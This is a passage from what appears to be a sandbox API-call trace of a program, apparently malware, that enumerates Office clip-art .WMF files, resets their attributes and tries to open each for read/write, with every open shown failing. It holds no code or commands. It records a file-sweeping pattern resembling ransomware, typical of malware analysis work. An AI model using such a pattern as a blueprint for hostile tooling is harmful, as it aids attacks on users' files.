(lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.768] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.768] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.768] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF", dwFileAttributes=0x80) returned 0 [0135.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18201_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.770] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF", dwFileAttributes=0x80) returned 0 [0135.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.770] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF", dwFileAttributes=0x80) returned 0 [0135.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18203_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18203_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.771] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.771] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF", dwFileAttributes=0x80) returned 0 [0135.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18204_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18204_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.771] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.771] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.771] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF", dwFileAttributes=0x80) returned 0 [0135.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18205_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.772] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.772] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF", dwFileAttributes=0x80) returned 0 [0135.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.773] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF", dwFileAttributes=0x80) returned 0 [0135.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18207_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.773] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF", dwFileAttributes=0x80) returned 0 [0135.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18208_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18208_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.774] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.774] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF", dwFileAttributes=0x80) returned 0 [0135.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18209_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18209_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.775] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF", dwFileAttributes=0x80) returned 0 [0135.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18210_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF", dwFileAttributes=0x80) returned 0 [0135.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18211_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF", dwFileAttributes=0x80) returned 0 [0135.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18212_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.777] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF", dwFileAttributes=0x80) returned 0 [0135.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18213_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18213_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.778] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF", dwFileAttributes=0x80) returned 0 [0135.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18214_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18214_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.778] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF", dwFileAttributes=0x80) returned 0 [0135.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18215_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.779] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF", dwFileAttributes=0x80) returned 0 [0135.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.780] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.780] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.780] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF", dwFileAttributes=0x80) returned 0 [0135.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18217_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.781] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.781] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.781] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF", dwFileAttributes=0x80) returned 0 [0135.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18218_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.781] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.782] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF", dwFileAttributes=0x80) returned 0 [0135.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18219_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18219_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.782] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF", dwFileAttributes=0x80) returned 0 [0135.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18220_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.783] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.783] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.783] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF", dwFileAttributes=0x80) returned 0 [0135.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18221_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.784] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.784] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF", dwFileAttributes=0x80) returned 0 [0135.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.784] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.784] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF", dwFileAttributes=0x80) returned 0 [0135.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18223_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18223_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.785] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF", dwFileAttributes=0x80) returned 0 [0135.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18224_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.785] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF", dwFileAttributes=0x80) returned 0 [0135.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18225_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.786] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.786] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.787] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF", dwFileAttributes=0x80) returned 0 [0135.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18226_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18226_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.787] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.787] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.787] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF", dwFileAttributes=0x80) returned 0 [0135.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18227_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18227_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.787] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.788] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.788] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF", dwFileAttributes=0x80) returned 0 [0135.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18228_.wmf"), dwDesiredAccess=0xc0000000, 